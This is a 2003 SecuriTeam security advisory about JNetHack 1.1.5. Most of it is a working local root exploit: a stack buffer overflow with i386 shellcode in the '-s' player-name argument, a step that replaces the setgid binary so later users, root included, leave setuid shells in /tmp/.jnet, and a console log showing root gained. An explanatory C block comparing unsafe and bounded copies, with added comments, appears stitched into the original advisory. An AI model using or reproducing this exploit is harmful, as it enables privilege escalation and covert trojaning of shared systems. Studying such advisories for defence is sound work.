[EXPL] JNetHack Exploit Code Released

From: SecuriTeam (support_at_securiteam.com)
Date: 06/23/03

    To: list@securiteam.com
    Date: 23 Jun 2003 12:05:40 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security in Canada

    Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
    We welcome ISPs, system integrators and IT systems resellers
    to promote the most advanced vulnerability assessment solutions today.

    Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

    - - - - - - - - -

      JNetHack Exploit Code Released
    ------------------------------------------------------------------------

    SUMMARY

    JNetHack <http://www.jnethack.org/> is a Japanese localization of NetHack.
    A stack-based buffer overflow in the player-name argument accepted by its
    "-s" (score listing) mode allows local attackers to gain the privileges of
    the 'games' group, to which the binary is setgid. Because of incorrect
    permissions on the installed files, a process running as group 'games' can
    then replace the binary and collect the effective uid of every later user
    who runs it, root included, as the exploit below demonstrates.

    DETAILS

    Vulnerable systems:
     * JNetHack version 1.1.5 and prior
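    What the one-line description above amounts to in code, as an added illustration that is not JNetHack's source (the 32-byte buffer, the function names and the constructed 300-byte argument sized to match the exploit's LEN are assumptions): an unbounded copy of the "-s" player-name argument into a fixed stack buffer, next to a bounded version that refuses over-long names instead of overflowing.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_BUF 32     /* assumed size of the on-stack name buffer */

/* Vulnerable pattern: strcpy() copies until the argument's terminating NUL,
 * so anything longer than NAME_BUF runs past 'name' over the saved frame
 * pointer and return address.  That is exactly what a 300-byte "-s" argument
 * made of NOPs, shellcode and a repeated return address exploits.  Only ever
 * call this with a short name; the return value is the copied length. */
int lookup_scores_unsafe(const char *player)
{
    char name[NAME_BUF];

    strcpy(name, player);                     /* no bound: stack smash */
    return (int)strlen(name);
}

/* Hardened version: find the NUL within the buffer size before copying and
 * refuse the argument (-1) if it is not there.  Refusing beats silently
 * truncating in a privileged binary, where a truncated name could still be
 * matched against someone else's score record. */
int lookup_scores_safe(const char *player)
{
    char name[NAME_BUF];
    const char *nul = memchr(player, '\0', NAME_BUF);

    if (nul == NULL)
        return -1;                            /* no room for name + NUL */
    memcpy(name, player, (size_t)(nul - player) + 1);
    return (int)(nul - player);
}

/* Constructed input: an argument of 'n' identical bytes, NUL-terminated, the
 * shape of the exploit's 300-byte payload (0x90 is the x86 NOP).  Caller frees. */
char *make_long_arg(size_t n, unsigned char fill)
{
    char *arg = malloc(n + 1);

    if (arg == NULL)
        return NULL;
    memset(arg, fill, n);
    arg[n] = '\0';
    return arg;
}

int main(void)
{
    char *evil = make_long_arg(300, 0x90);

    if (evil == NULL)
        return 1;
    printf("safe(\"r-code\")   -> %d\n", lookup_scores_safe("r-code"));
    printf("safe(300 x 0x90) -> %d\n", lookup_scores_safe(evil));
    /* lookup_scores_unsafe(evil) is deliberately not called: it would corrupt
     * this process's stack the same way the exploit corrupts jnethack's. */
    free(evil);
    return 0;
}
```

    The safe variant accepts at most NAME_BUF - 1 characters; the exploit's payload, like any name of 32 or more bytes, is rejected before a single byte is copied.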

    Exploit:
    /*********************************************************************************\
       jnethack <= 1.1.5 exploit written by r-code d_fence@gmx.net [Elite FXP Team]

       jnethack has the sgid bit set and is owned by group 'games'.

       First we gain the GID of 'games' and then (due to incorrect permissions)
       we change the binary so that we can gain the uid/gid of anyone (hope
       that's root) who'll run jnethack (the shell lies at /tmp/.jnet/USERNAME).

    EXAMPLE (Tested on Debian Woody 3.0):

    r-code@coredump:/tmp$ tar -xzvf jnethack0x02.tar.gz
    hackjnet0x02.c
    sh
    r-code@coredump:/tmp$ cc hackjnet0x02.c -o hackjnet0x02
    r-code@coredump:/tmp$ ./hackjnet0x02
    * jnethack <= 1.1.15 exploit by r-code d_fence@gmx.net [Elite FXP Team]
    * Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher
    * Flames to: ElSiLaSoF

    + ESP: 0xbffff914
    + OFFSET 0x21ca, RET_ADDR: 0xbfffd752
    + If doesn't work try: "./hackjnet0x02 8500-8700" in 20 steps

    Cannot find any current entries for 1ÛØ°Í1ÛØ°.Í1ÀPh//shh/tmpãPSá1Ò°
                                                               Í1ÛØ°Í¿R×ÿ¿R×ÿ¿
    R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×
    ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿R×ÿ¿
    Call is: jnethack -s [-v] [-role] [maxrank] [playernames]
    mkdir: cannot create directory `/tmp/.jnet': File exists
    :: Compilling files..
    :: Changing the binary..
    :: Cleaning a bit..

    iNFO) Done!
    iNFO) Now every user who runs /usr/lib/games/jnethack/jnethack will leave
          a shell with his euid in /tmp/.jnet/
    iNFO) Elite FXP Team - the ultimative 31337 Crew ;]
    r-code@coredump:/tmp$ su -
    Password:
    bash-2.05a# jnethack
    [Here comes the normal jnethack, so that root can't see that it's a
    different binary]
    bash-2.05a# su r-code
    r-code@coredump:/tmp$ cd /tmp/.jnet/
    r-code@coredump:/tmp/.jnet$ ls -al
    total 1460
    drwxrwxrwx 2 r-code games 4096 Jun 19 21:37 .
    drwxrwxrwt 129 root root 12288 Jun 19 21:36 ..
    -rw-rw---- 1 r-code games 436 Jun 19 21:36 change.c
    -rwxr-sr-x 1 r-code games 1448696 Jun 19 21:36 jnethack-orig
    -rwsr-xr-x 1 root root 5347 Jun 19 21:37 root
    -r-xr-xr-x 1 r-code games 5347 Jun 19 21:36 run
    -rw-rw---- 1 r-code games 298 Jun 19 21:36 run.c
    r-code@coredump:/tmp/.jnet$ ./root
    sh-2.05a# id
    uid=0(root) gid=0(root) groups=1009(r-code)
    sh-2.05a# exit
    exit

     Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher
     Flames to: ElSiLaSoF - *** ya bitch!!!
                                                                               
          
    \*********************************************************************************/

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>

    /* Return the current stack pointer (i386 only, like the rest of this
     * exploit); the original relied on the value being left behind in %eax. */
    unsigned long int get_sp(void) {
      unsigned long int sp;
      __asm__ volatile("movl %%esp,%0" : "=r"(sp));
      return sp;
    }

    /* i386 Linux shellcode: setuid(0); setgid(0); execve("/tmp//sh"); exit(0).
     * /tmp//sh is the 'sh' helper extracted from the tarball next to this file
     * (it is what creates /tmp/.jnet and swaps the binary); the setuid(0) and
     * setgid(0) calls simply fail while the process only has egid 'games'. */
    char shellcode[] =
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"     /* xor ebx,ebx; mov eax,ebx; mov al,23; int 0x80 -> setuid(0) */
    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"     /* same with al=46                                -> setgid(0) */
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"     /* xor eax,eax; push eax; push "//sh"                        */
    "\x68\x2f\x74\x6d\x70\x89\xe3\x50"     /* push "/tmp"; mov ebx,esp; push eax                        */
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"     /* push ebx; mov ecx,esp; xor edx,edx; mov al,11; int 0x80   */
    "\x80\x31\xdb\x89\xd8\xb0\x01\xcd\x80" /* -> execve("/tmp//sh", ...); then exit(0)                  */
    ;

    #define LEN 300                        /* payload length; must be a multiple of 4 */
    #define DEFAULT_OFFSET 8650
    #define PATH "/usr/lib/games/jnethack/jnethack"

    int main(int argc, char **argv) {
      int i;
      char *evilstr;
      unsigned long int retaddr, offset = DEFAULT_OFFSET;

      printf("* jnethack <= 1.1.15 exploit by r-code d_fence@gmx.net [Elite FXP Team]\n");
      printf("* Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher\n");
      printf("* Flames to: ElSiLaSoF\n\n");

      if (argc > 1)
        offset = atoi(argv[1]);

      /* Guess where the payload will sit on jnethack's stack: our own %esp
       * minus a fixed offset.  If the guess is wrong, step the offset by 20. */
      retaddr = get_sp() - offset;

      printf("+ ESP: 0x%lx\n", get_sp());
      printf("+ OFFSET 0x%lx, RET_ADDR: 0x%lx\n", offset, retaddr);
      printf("+ If doesn't work try: \"%s 8500-8700\" in 20 steps\n", argv[0]);

      /* LEN + 1 so the terminating NUL fits; the original allocated LEN bytes
       * and wrote evilstr[LEN], one byte past the end of the allocation. */
      evilstr = malloc(LEN + 1);
      if (evilstr == NULL) {
        perror("malloc");
        return 1;
      }

      /* Fill the whole buffer with the guessed return address, little-endian... */
      for (i = 0; i < LEN; ) {
        evilstr[i++] = retaddr & 0xff;
        evilstr[i++] = (retaddr >> 8) & 0xff;
        evilstr[i++] = (retaddr >> 16) & 0xff;
        evilstr[i++] = (retaddr >> 24) & 0xff;
      }

      /* ...then a NOP sled over the first half with the shellcode centred in
       * it, leaving the repeated return address to land on the saved EIP. */
      memset(evilstr, 0x90, LEN / 2);
      for (i = 0; i < (int)strlen(shellcode); i++)
        evilstr[(LEN / 2) - (strlen(shellcode) / 2) + i] = shellcode[i];

      evilstr[LEN] = '\0';

      /* The overflow is in the player-name argument of "-s" (score listing). */
      execl(PATH, "jnethack", "-s", evilstr, (char *)NULL);
      perror("execl");
      return 1;
    }

    ADDITIONAL INFORMATION

    The information has been provided by r-code <mailto:r-code@smart.toya.net.pl>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

